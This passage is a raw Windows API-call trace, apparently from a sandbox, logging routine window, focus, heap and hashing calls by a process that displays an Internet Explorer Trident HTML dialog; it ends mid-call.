[0159.524] StrCmpICW (pszStr1="ms sans serif", pszStr2="default") returned 9 [0159.524] MulDiv (nNumber=8000, nNumerator=20, nDenominator=1000) returned 160 [0159.524] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0159.528] GetWindowLongW (hWnd=0x103e0, nIndex=-21) returned 13854800 [0159.528] NtdllDefWindowProc_W () returned 0x0 [0159.528] GetWindowLongW (hWnd=0x103e0, nIndex=-21) returned 13854800 [0159.528] NtdllDefWindowProc_W () returned 0x0 [0159.542] GetWindowLongW (hWnd=0x103e0, nIndex=-21) returned 13854800 [0159.542] IsIconic (hWnd=0x103e0) returned 0 [0159.542] GetWindowRect (in: hWnd=0x103e0, lpRect=0x1994cc | out: lpRect=0x1994cc) returned 1 [0159.542] MoveWindow (hWnd=0x103e0, X=499, Y=302, nWidth=458, nHeight=295, bRepaint=1) returned 1 [0159.542] GetWindowLongW (hWnd=0x103e0, nIndex=-21) returned 13854800 [0159.542] NtdllDefWindowProc_W () returned 0x0 [0159.542] GetWindowLongW (hWnd=0x103e0, nIndex=-21) returned 13854800 [0159.542] NtdllDefWindowProc_W () returned 0x0 [0159.543] GetWindowLongW (hWnd=0x103e0, nIndex=-21) returned 13854800 [0159.543] IsIconic (hWnd=0x103e0) returned 0 [0159.543] GetClientRect (in: hWnd=0x103e0, lpRect=0x1992a4 | out: lpRect=0x1992a4) returned 1 [0159.545] GetWindowLongW (hWnd=0x103e0, nIndex=-21) returned 13854800 [0159.545] NtdllDefWindowProc_W () returned 0x0 [0159.545] GetWindowLongW (hWnd=0x103e0, nIndex=-21) returned 13854800 [0159.545] NtdllDefWindowProc_W () returned 0x0 [0159.545] GetWindowLongW (hWnd=0x103e0, nIndex=-21) returned 13854800 [0159.545] NtdllDefWindowProc_W () returned 0x0 [0159.546] GetClientRect (in: hWnd=0x103e0, lpRect=0x1994cc | out: lpRect=0x1994cc) returned 1 [0159.548] ShowWindow (hWnd=0x103e0, nCmdShow=5) returned 0 [0159.549] GetWindowLongW (hWnd=0x103e0, nIndex=-21) returned 13854800 [0159.549] NtdllDefWindowProc_W () returned 0x0 [0159.549] GetWindowLongW (hWnd=0x103e0, nIndex=-21) returned 13854800 [0159.549] NtdllDefWindowProc_W () returned 0x0 [0159.549] NtdllDefWindowProc_W () returned 0x0 [0159.549] NtdllDefWindowProc_W () returned 0x0 [0159.606] NtdllDefWindowProc_W () returned 0x1 [0159.609] GetWindowLongW (hWnd=0x103e0, nIndex=-21) returned 13854800 [0159.609] NtdllDefWindowProc_W () returned 0x0 [0159.609] GetWindowLongW (hWnd=0x103e0, nIndex=-21) returned 13854800 [0159.609] VirtualProtect (in: lpAddress=0x6e8a7000, dwSize=0xb44, flNewProtect=0x4, lpflOldProtect=0x6e793704 | out: lpflOldProtect=0x6e793704*=0x2) returned 1 [0159.610] GetProcAddress (hModule=0x76f60000, lpProcName=0xac) returned 0x76f770d0 [0159.612] VirtualProtect (in: lpAddress=0x6e8a7000, dwSize=0xb44, flNewProtect=0x2, lpflOldProtect=0x199478 | out: lpflOldProtect=0x199478*=0x4) returned 1 [0159.613] IUnknown_GetWindow (in: punk=0x0, phwnd=0x199500 | out: phwnd=0x199500) returned 0x80004005 [0159.613] NtdllDefWindowProc_W () returned 0x1 [0159.615] GetWindowLongW (hWnd=0x103e0, nIndex=-21) returned 13854800 [0159.615] GetWindowLongW (hWnd=0x103ba, nIndex=-21) returned 13697024 [0159.615] GetAncestor (hwnd=0x103ba, gaFlags=0x3) returned 0x4031a [0159.615] GetAncestor (hwnd=0x103e0, gaFlags=0x3) returned 0x4031a [0159.615] IsChild (hWndParent=0x103ba, hWnd=0x103e0) returned 0 [0159.615] GetClassNameW (in: hWnd=0x103e0, lpClassName=0x199300, nMaxCount=26 | out: lpClassName="Internet Explorer_Trident") returned 25 [0159.615] PostMessageW (hWnd=0x103ba, Msg=0x491, wParam=0x0, lParam=0x0) returned 1 [0159.616] ScreenToClient (in: hWnd=0x103ba, lpPoint=0x198f20 | out: lpPoint=0x198f20) returned 1 [0159.616] ScreenToClient (in: hWnd=0x103ba, lpPoint=0x198f20 | out: lpPoint=0x198f20) returned 1 [0159.616] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0159.616] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0159.617] GetCurrentThreadId () returned 0xb48 [0159.617] GetCurrentThreadId () returned 0xb48 [0159.617] GetCurrentThreadId () returned 0xb48 [0159.617] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0159.618] GetMessageTime () returned 30876093 [0159.618] GetMessagePos () returned 0x11e01d6 [0159.618] CActiveIMMAppEx_Trident:IActiveIMMApp:OnDefWindowProc (in: This=0x610430, hWnd=0x103ba, msg=0x8, wParam=0x103e0, lParam=0x0, plResult=0x199154 | out: plResult=0x199154) returned 0x1 [0159.618] NtdllDefWindowProc_W () returned 0x0 [0159.618] GetCurrentThreadId () returned 0xb48 [0159.621] GetWindowLongW (hWnd=0x103ba, nIndex=-21) returned 13697024 [0159.621] GetMessageTime () returned 30876093 [0159.622] GetMessagePos () returned 0x11e01d6 [0159.622] CActiveIMMAppEx_Trident:IActiveIMMApp:OnDefWindowProc (in: This=0x610430, hWnd=0x103ba, msg=0x281, wParam=0x0, lParam=0xc000000f, plResult=0x198e4c | out: plResult=0x198e4c) returned 0x0 [0159.623] GetCurrentThreadId () returned 0xb48 [0159.624] GetWindowLongW (hWnd=0x103e0, nIndex=-21) returned 13854800 [0159.624] NtdllDefWindowProc_W () returned 0x0 [0159.625] GetWindowLongW (hWnd=0x103ba, nIndex=-21) returned 13697024 [0159.625] GetMessageTime () returned 30876093 [0159.626] GetMessagePos () returned 0x11e01d6 [0159.626] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0159.665] CActiveIMMAppEx_Trident:IActiveIMMApp:OnDefWindowProc (in: This=0x610430, hWnd=0x103ba, msg=0x282, wParam=0x1, lParam=0x0, plResult=0x1989c4 | out: plResult=0x1989c4) returned 0x0 [0159.665] GetCurrentThreadId () returned 0xb48 [0159.665] GetWindowLongW (hWnd=0x103e0, nIndex=-21) returned 13854800 [0159.665] NtdllDefWindowProc_W () returned 0x0 [0159.665] GetWindowLongW (hWnd=0x103e0, nIndex=-21) returned 13854800 [0159.666] NtdllDefWindowProc_W () returned 0x0 [0159.666] GetWindowLongW (hWnd=0x103e0, nIndex=-21) returned 13854800 [0159.666] NtdllDefWindowProc_W () returned 0x0 [0159.668] GetWindowLongW (hWnd=0x103e0, nIndex=-21) returned 13854800 [0159.668] GetWindowLongW (hWnd=0x103e0, nIndex=-21) returned 13854800 [0159.668] IsIconic (hWnd=0x103e0) returned 0 [0159.668] GetClientRect (in: hWnd=0x103e0, lpRect=0x1994f4 | out: lpRect=0x1994f4) returned 1 [0159.671] NtdllDefWindowProc_W () returned 0x0 [0159.672] NtdllDefWindowProc_W () returned 0x0 [0159.673] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0159.673] OffsetRect (in: lprc=0xd0c5ac, dx=0, dy=0 | out: lprc=0xd0c5ac) returned 1 [0159.673] OffsetRect (in: lprc=0xd0c5bc, dx=0, dy=0 | out: lprc=0xd0c5bc) returned 1 [0159.679] SetWindowLongW (hWnd=0x103e2, nIndex=-21, dwNewLong=13702144) returned 0 [0159.679] GetWindowLongW (hWnd=0x103e2, nIndex=-20) returned 0 [0159.679] GetAncestor (hwnd=0x103e2, gaFlags=0x2) returned 0x103e0 [0159.679] GetWindowLongW (hWnd=0x103e0, nIndex=-20) returned 257 [0159.679] GetWindowLongW (hWnd=0x103e2, nIndex=-20) returned 0 [0159.679] GetParent (hWnd=0x103e2) returned 0x103e0 [0159.679] GetWindowLongW (hWnd=0x103e0, nIndex=-20) returned 257 [0159.679] GetParent (hWnd=0x103e0) returned 0x70258 [0159.679] GetWindowLongW (hWnd=0x70258, nIndex=-20) returned 262400 [0159.679] GetParent (hWnd=0x70258) returned 0x4031a [0159.679] GetWindowLongW (hWnd=0x4031a, nIndex=-20) returned 256 [0159.679] GetParent (hWnd=0x4031a) returned 0x0 [0159.680] CActiveIMMAppEx_Trident:IActiveIMMApp:OnDefWindowProc (in: This=0x610430, hWnd=0x103e2, msg=0x81, wParam=0x0, lParam=0x199088*=13702144, plResult=0x198ec4 | out: plResult=0x198ec4) returned 0x1 [0159.680] NtdllDefWindowProc_W () returned 0x1 [0159.680] GetCurrentThreadId () returned 0xb48 [0159.680] GetWindowLongW (hWnd=0x103e2, nIndex=-21) returned 13702144 [0159.680] GetCurrentThreadId () returned 0xb48 [0159.680] GetWindowLongW (hWnd=0x103e2, nIndex=-21) returned 13702144 [0159.680] CActiveIMMAppEx_Trident:IActiveIMMApp:OnDefWindowProc (in: This=0x610430, hWnd=0x103e2, msg=0x1, wParam=0x0, lParam=0x199088*=13702144, plResult=0x198ec4 | out: plResult=0x198ec4) returned 0x1 [0159.680] NtdllDefWindowProc_W () returned 0x0 [0159.680] GetCurrentThreadId () returned 0xb48 [0159.681] GetWindowLongW (hWnd=0x103e2, nIndex=-21) returned 13702144 [0159.681] CActiveIMMAppEx_Trident:IActiveIMMApp:OnDefWindowProc (in: This=0x610430, hWnd=0x103e2, msg=0x5, wParam=0x0, lParam=0x10001ba, plResult=0x198f10 | out: plResult=0x198f10) returned 0x1 [0159.681] NtdllDefWindowProc_W () returned 0x0 [0159.681] GetCurrentThreadId () returned 0xb48 [0159.681] GetWindowLongW (hWnd=0x103e2, nIndex=-21) returned 13702144 [0159.681] CActiveIMMAppEx_Trident:IActiveIMMApp:OnDefWindowProc (in: This=0x610430, hWnd=0x103e2, msg=0x3, wParam=0x0, lParam=0x0, plResult=0x198f10 | out: plResult=0x198f10) returned 0x1 [0159.681] NtdllDefWindowProc_W () returned 0x0 [0159.681] GetCurrentThreadId () returned 0xb48 [0159.681] GetWindowLongW (hWnd=0x103e0, nIndex=-21) returned 13854800 [0159.682] NtdllDefWindowProc_W () returned 0x0 [0159.682] GetWindowRect (in: hWnd=0x103e2, lpRect=0x1992e0 | out: lpRect=0x1992e0) returned 1 [0159.682] GetParent (hWnd=0x103e2) returned 0x103e0 [0159.682] MapWindowPoints (in: hWndFrom=0x0, hWndTo=0x103e0, lpPoints=0x1992e0, cPoints=0x2 | out: lpPoints=0x1992e0) returned -21758459 [0159.682] GetClassNameW (in: hWnd=0x103e0, lpClassName=0x1992f0, nMaxCount=256 | out: lpClassName="Internet Explorer_TridentDlgFrame") returned 33 [0159.682] CActiveIMMAppEx_Trident:IActiveIMMApp:Activate (This=0x610430, fRestoreLayout=1) returned 0x0 [0159.682] SendMessageW (hWnd=0x103e2, Msg=0x129, wParam=0x0, lParam=0x0) returned 0x0 [0159.682] GetWindowLongW (hWnd=0x103e2, nIndex=-21) returned 13702144 [0159.682] CActiveIMMAppEx_Trident:IActiveIMMApp:OnDefWindowProc (in: This=0x610430, hWnd=0x103e2, msg=0x129, wParam=0x0, lParam=0x0, plResult=0x1993ac | out: plResult=0x1993ac) returned 0x1 [0159.682] NtdllDefWindowProc_W () returned 0x0 [0159.682] GetCurrentThreadId () returned 0xb48 [0159.682] RegisterTouchHitTestingWindow (hwnd=0x103e2, value=0x1) returned 1 [0159.683] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0159.683] QISearch (in: that=0xd0ebe0, pqit=0x6d6fca98, riid=0x6d6fcaa8*(Data1=0xa5200748, Data2=0x18ae, Data3=0x4da5, Data4=([0]=0x93, [1]=0xaf, [2]=0x0, [3]=0x19, [4]=0x47, [5]=0x70, [6]=0x3, [7]=0xa1)), ppv=0xd12200 | out: that=0xd0ebe0, ppv=0xd12200*=0xd0ebe0) returned 0x0 [0159.683] IUnknown:AddRef (This=0xd0ebe0) returned 0x2 [0159.684] IntersectRect (in: lprcDst=0x19955c, lprcSrc1=0xd0c5ac, lprcSrc2=0xd0c5bc | out: lprcDst=0x19955c) returned 1 [0159.684] EqualRect (lprc1=0x19955c, lprc2=0xd0c5ac) returned 1 [0159.685] InitOnceExecuteOnce (in: InitOnce=0x6e89927c, InitFn=0x6dd8e660, Parameter=0x0, Context=0x0 | out: InitOnce=0x6e89927c, Parameter=0x0, Context=0x0) returned 1 [0159.685] GetProcessHeap () returned 0x5e0000 [0159.685] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x8, Size=0x30) returned 0x6cf2b8 [0159.685] WTSGetActiveConsoleSessionId () returned 0x1 [0159.685] EnumDisplaySettingsW (in: lpszDeviceName=0x0, iModeNum=0xffffffff, lpDevMode=0x199450 | out: lpDevMode=0x199450) returned 1 [0159.687] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0159.687] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0159.687] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0159.687] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0159.687] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0159.687] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0159.687] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x6c) returned 0x63eb80 [0159.688] MulDiv (nNumber=8000, nNumerator=20, nDenominator=1000) returned 160 [0159.688] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0159.688] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0159.688] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0159.689] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0159.689] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x10) returned 0x6d9390 [0159.689] HashData (in: pbData=0x6d9390, cbData=0x1, pbHash=0x198430, cbHash=0x2 | out: pbHash=0x198430) returned 0x0 [0159.689] HashData (in: pbData=0x19842c, cbData=0x4, pbHash=0x198438, cbHash=0x2 | out: pbHash=0x198438) returned 0x0 [0159.689] HashData (in: pbData=0x6d9394, cbData=0xc, pbHash=0x198434, cbHash=0x2 | out: pbHash=0x198434) returned 0x0 [0159.689] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0159.689] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0159.689] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x10) returned 0x6d92d0 [0159.689] HashData (in: pbData=0x6d92d0, cbData=0x1, pbHash=0x198430, cbHash=0x2 | out: pbHash=0x198430) returned 0x0 [0159.689] HashData (in: pbData=0x19842c, cbData=0x4, pbHash=0x198438, cbHash=0x2 | out: pbHash=0x198438) returned 0x0 [0159.689] HashData (in: pbData=0x6d92d4, cbData=0xc, pbHash=0x198434, cbHash=0x2 | out: pbHash=0x198434) returned 0x0 [0159.689] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6d92d0 | out: hHeap=0x5e0000) returned 1 [0159.695] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0159.695] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0159.695] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6b6568 | out: hHeap=0x5e0000) returned 1 [0159.695] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0159.696] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0159.696] QueryPerformanceCounter (in: lpPerformanceCount=0xd11de0 | out: lpPerformanceCount=0xd11de0*=3097851472056) returned 1 [0159.696] GetCurrentThreadId () returned 0xb48 [0159.696] GetCurrentThreadId () returned 0xb48 [0159.696] GetCurrentThreadId () returned 0xb48 [0159.696] HashData (in: pbData=0x6d9480, cbData=0x1, pbHash=0x198c40, cbHash=0x2 | out: pbHash=0x198c40) returned 0x0 [0159.696] HashData (in: pbData=0x198c3c, cbData=0x4, pbHash=0x198c48, cbHash=0x2 | out: pbHash=0x198c48) returned 0x0 [0159.696] HashData (in: pbData=0x6d9484, cbData=0xc, pbHash=0x198c44, cbHash=0x2 | out: pbHash=0x198c44) returned 0x0 [0159.696] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6d9480 | out: hHeap=0x5e0000) returned 1 [0159.696] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x10) returned 0x6d94b0 [0159.696] HashData (in: pbData=0x6d94b0, cbData=0x1, pbHash=0x198c40, cbHash=0x2 | out: pbHash=0x198c40) returned 0x0 [0159.696] HashData (in: pbData=0x198c3c, cbData=0x4, pbHash=0x198c48, cbHash=0x2 | out: pbHash=0x198c48) returned 0x0 [0159.696] HashData (in: pbData=0x6d94b4, cbData=0xc, pbHash=0x198c44, cbHash=0x2 | out: pbHash=0x198c44) returned 0x0 [0159.696] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6d94b0 | out: hHeap=0x5e0000) returned 1 [0159.697] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0159.697] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0159.697] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0159.697] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0159.697] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0159.698] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0159.698] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0159.698] LsSetDoc () returned 0x0 [0159.698] LsCreateLine () returned 0x0 [0159.698] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0159.734] LsQueryLineDup () returned 0x0 [0159.735] LsDestroyLine () returned 0x0 [0159.735] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0159.737] QueryPerformanceCounter (in: lpPerformanceCount=0x1994d0 | out: lpPerformanceCount=0x1994d0*=3097855628109) returned 1 [0159.737] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0159.745] QueryPerformanceCounter (in: lpPerformanceCount=0x199454 | out: lpPerformanceCount=0x199454*=3097856385713) returned 1 [0159.745] QueryPerformanceCounter (in: lpPerformanceCount=0x199440 | out: lpPerformanceCount=0x199440*=3097856396577) returned 1 [0159.745] QueryPerformanceCounter (in: lpPerformanceCount=0x1993e4 | out: lpPerformanceCount=0x1993e4*=3097856408359) returned 1 [0159.745] QueryPerformanceCounter (in: lpPerformanceCount=0x1993dc | out: lpPerformanceCount=0x1993dc*=3097856433570) returned 1 [0159.745] QueryPerformanceCounter (in: lpPerformanceCount=0x1992fc | out: lpPerformanceCount=0x1992fc*=3097856443692) returned 1 [0159.746] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0159.746] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0159.746] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0159.746] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0159.746] SetEvent (hEvent=0x304) returned 1 [0159.746] WTSGetActiveConsoleSessionId () returned 0x1 [0159.746] QueryPerformanceCounter (in: lpPerformanceCount=0x199248 | out: lpPerformanceCount=0x199248*=3097856529648) returned 1 [0159.746] _vsnwprintf (in: _Buffer=0x1992d8, _BufferCount=0x4f, _Format="VSyncHelper-%p-%I64x", _ArgList=0x199264 | out: _Buffer="VSyncHelper-006CF2B8-7367764b0") returned 30 [0159.746] RegisterClassW (lpWndClass=0x1992b0) returned 0xc242 [0159.747] CreateWindowExW (dwExStyle=0x0, lpClassName=0xc242, lpWindowName=0x0, dwStyle=0x0, X=0, Y=0, nWidth=0, nHeight=0, hWndParent=0x0, hMenu=0x0, hInstance=0x0, lpParam=0x6cf2b8) returned 0x103e4 [0159.747] GetWindowLongW (hWnd=0x103e4, nIndex=-21) returned 0 [0159.747] NtdllDefWindowProc_W () returned 0x0 [0159.748] GetWindowLongW (hWnd=0x103e4, nIndex=-21) returned 0 [0159.748] NtdllDefWindowProc_W () returned 0x1 [0159.749] GetWindowLongW (hWnd=0x103e4, nIndex=-21) returned 0 [0159.749] NtdllDefWindowProc_W () returned 0x0 [0159.750] GetWindowLongW (hWnd=0x103e4, nIndex=-21) returned 0 [0159.750] NtdllDefWindowProc_W () returned 0x0 [0159.750] SetWindowLongW (hWnd=0x103e4, nIndex=-21, dwNewLong=7140024) returned 0 [0159.750] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x668 [0159.751] CreateFileMappingW (hFile=0xffffffff, lpFileMappingAttributes=0x0, flProtect=0x8000004, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x28, lpName=0x0) returned 0x66c [0159.751] MapViewOfFile (hFileMappingObject=0x66c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x28) returned 0x95f0000 [0159.752] GetCurrentProcessId () returned 0xe14 [0159.752] GetCurrentThreadId () returned 0xb48 [0159.752] RegisterPowerSettingNotification (hRecipient=0x103e4, PowerSettingGuid=0x6d75f000, Flags=0x0) returned 0x692720 [0159.753] GetProcessHeap () returned 0x5e0000 [0159.753] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x8, Size=0x40) returned 0x6db1a8 [0159.753] OpenProcess (dwDesiredAccess=0x100040, bInheritHandle=0, dwProcessId=0xe14) returned 0x674 [0159.753] OpenThread (dwDesiredAccess=0x100040, bInheritHandle=0, dwThreadId=0xb48) returned 0x678 [0159.753] GetProcessIdOfThread (Thread=0x678) returned 0xe14 [0159.753] GetWindowThreadProcessId (in: hWnd=0x103e4, lpdwProcessId=0x19922c | out: lpdwProcessId=0x19922c) returned 0xb48 [0159.753] GetCurrentProcess () returned 0xffffffff [0159.753] DuplicateHandle (in: hSourceProcessHandle=0x674, hSourceHandle=0x66c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x199230, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x199230*=0x67c) returned 1 [0159.753] MapViewOfFile (hFileMappingObject=0x67c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x28) returned 0x9610000 [0159.760] GetCurrentProcess () returned 0xffffffff [0159.760] DuplicateHandle (in: hSourceProcessHandle=0x674, hSourceHandle=0x668, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x6db1e0, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x6db1e0*=0x680) returned 1 [0159.760] SetEvent (hEvent=0x310) returned 1 [0159.760] CloseHandle (hObject=0x67c) returned 1 [0159.760] CloseHandle (hObject=0x674) returned 1 [0159.760] SetEvent (hEvent=0x668) returned 1 [0159.760] QueryPerformanceCounter (in: lpPerformanceCount=0x199408 | out: lpPerformanceCount=0x199408*=3097857934717) returned 1 [0159.761] GetWindowLongW (hWnd=0x103e2, nIndex=-21) returned 13702144 [0159.761] CActiveIMMAppEx_Trident:IActiveIMMApp:OnDefWindowProc (in: This=0x610430, hWnd=0x103e2, msg=0x46, wParam=0x0, lParam=0x199544*=66530, plResult=0x1993a0 | out: plResult=0x1993a0) returned 0x1 [0159.761] NtdllDefWindowProc_W () returned 0x0 [0159.761] GetCurrentThreadId () returned 0xb48 [0159.762] GetWindowLongW (hWnd=0x103e2, nIndex=-21) returned 13702144 [0159.762] CActiveIMMAppEx_Trident:IActiveIMMApp:OnDefWindowProc (in: This=0x610430, hWnd=0x103e2, msg=0x47, wParam=0x0, lParam=0x199544*=66530, plResult=0x19939c | out: plResult=0x19939c) returned 0x1 [0159.762] NtdllDefWindowProc_W () returned 0x0 [0159.762] GetCurrentThreadId () returned 0xb48 [0159.762] RedrawWindow (hWnd=0x103e2, lprcUpdate=0x0, hrgnUpdate=0x0, flags=0xa1) returned 1 [0159.762] SetTimer (hWnd=0x103e2, nIDEvent=0x1000, uElapse=0x64, lpTimerFunc=0x0) returned 0x1000 [0159.764] GetFocus () returned 0x103e0 [0159.765] EnumChildWindows (hWndParent=0x103e2, lpEnumFunc=0x6e0775e0, lParam=0x19930f) returned 0 [0159.765] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0159.765] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0159.765] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0159.765] GetFocus () returned 0x103e0 [0159.765] EnumChildWindows (hWndParent=0x103e2, lpEnumFunc=0x6e0775e0, lParam=0x19905f) returned 0 [0159.765] ScreenToClient (in: hWnd=0x103e2, lpPoint=0x199040 | out: lpPoint=0x199040) returned 1 [0159.765] GetFocus () returned 0x103e0 [0159.766] EnumChildWindows (hWndParent=0x103e2, lpEnumFunc=0x6e0775e0, lParam=0x19905f) returned 0 [0159.766] ScreenToClient (in: hWnd=0x103e2, lpPoint=0x199040 | out: lpPoint=0x199040) returned 1 [0159.766] GetFocus () returned 0x103e0 [0159.766] EnumChildWindows (hWndParent=0x103e2, lpEnumFunc=0x6e0775e0, lParam=0x19905f) returned 0 [0159.766] ScreenToClient (in: hWnd=0x103e2, lpPoint=0x199040 | out: lpPoint=0x199040) returned 1 [0159.766] ScreenToClient (in: hWnd=0x103e2, lpPoint=0x199040 | out: lpPoint=0x199040) returned 1 [0159.767] ScreenToClient (in: hWnd=0x103e2, lpPoint=0x199040 | out: lpPoint=0x199040) returned 1 [0159.767] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0159.767] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0159.767] GetCurrentThreadId () returned 0xb48 [0159.767] GetCurrentThreadId () returned 0xb48 [0159.768] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0159.768] GetCurrentThreadId () returned 0xb48 [0159.768] GetCurrentThreadId () returned 0xb48 [0159.768] GetCurrentThreadId () returned 0xb48 [0159.768] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0159.768] malloc (_Size=0x160) returned 0xc51318 [0159.769] GetCurrentThreadId () returned 0xb48 [0159.769] CActiveIMMAppEx_Trident:IActiveIMMApp:getContext (in: This=0x610430, hWnd=0x103e2, phIMC=0x1994f8 | out: phIMC=0x1994f8*=0x1e012b) returned 0x0 [0159.769] CActiveIMMAppEx_Trident:IActiveIMMApp:AssociateContext (in: This=0x610430, hWnd=0x103e2, hIME=0x0, phPrev=0x1994f8 | out: phPrev=0x1994f8*=0x1e012b) returned 0x0 [0159.775] CActiveIMMAppEx_Trident:IActiveIMMApp:ReleaseContext (This=0x610430, hWnd=0x103e2, hIMC=0x1e012b) returned 0x0 [0159.775] GetFocus () returned 0x103e0 [0159.775] SetFocus (hWnd=0x103e2) returned 0x103e0 [0159.775] GetWindowLongW (hWnd=0x103e0, nIndex=-21) returned 13854800 [0159.775] NtdllDefWindowProc_W () returned 0x0 [0159.775] GetWindowLongW (hWnd=0x103e0, nIndex=-21) returned 13854800 [0159.775] NtdllDefWindowProc_W () returned 0x0 [0159.776] GetWindowLongW (hWnd=0x103e2, nIndex=-21) returned 13702144 [0159.776] GetMessageTime () returned 30876093 [0159.776] GetMessagePos () returned 0x11e01d6 [0159.776] CActiveIMMAppEx_Trident:IActiveIMMApp:OnDefWindowProc (in: This=0x610430, hWnd=0x103e2, msg=0x281, wParam=0x1, lParam=0xc000000f, plResult=0x198c84 | out: plResult=0x198c84) returned 0x0 [0159.777] GetCurrentThreadId () returned 0xb48 [0159.777] GetWindowLongW (hWnd=0x103e2, nIndex=-21) returned 13702144 [0159.777] CActiveIMMAppEx_Trident:IActiveIMMApp:getContext (in: This=0x610430, hWnd=0x103e2, phIMC=0x199054 | out: phIMC=0x199054*=0x0) returned 0x0 [0159.777] GetMessageTime () returned 30876093 [0159.777] GetMessagePos () returned 0x11e01d6 [0159.777] CActiveIMMAppEx_Trident:IActiveIMMApp:OnDefWindowProc (in: This=0x610430, hWnd=0x103e2, msg=0x7, wParam=0x103e0, lParam=0x0, plResult=0x198fb4 | out: plResult=0x198fb4) returned 0x1 [0159.777] NtdllDefWindowProc_W () returned 0x0 [0159.777] GetCurrentThreadId () returned 0xb48 [0159.778] GetFocus () returned 0x103e2 [0159.778] LoadStringW (in: hInstance=0x6d6d0000, uID=0xb5, lpBuffer=0x199460, cchBufferMax=46 | out: lpBuffer="HTML Document") returned 0xd [0159.778] LoadStringW (in: hInstance=0x6d6d0000, uID=0xb5, lpBuffer=0x1994c8, cchBufferMax=46 | out: lpBuffer="HTML Document") returned 0xd [0159.778] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0159.779] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0159.779] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0159.779] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0159.779] BringWindowToTop (hWnd=0x103e0) returned 1 [0159.779] GetWindowLongW (hWnd=0x103e0, nIndex=-21) returned 13854800 [0159.780] NtdllDefWindowProc_W () returned 0x0 [0159.780] NtdllDefWindowProc_W () returned 0x0 [0159.780] NtdllDefWindowProc_W () returned 0x0 [0159.781] GetWindowLongW (hWnd=0x103e0, nIndex=-21) returned 13854800 [0159.781] NtdllDefWindowProc_W () returned 0x0 [0159.783] GetWindowLongW (hWnd=0x103e0, nIndex=-21) returned 13854800 [0159.783] GetWindowLongW (hWnd=0x103e2, nIndex=-21) returned 13702144 [0159.783] GetCurrentThreadId () returned 0xb48 [0159.784] GetWindowLongW (hWnd=0x103e2, 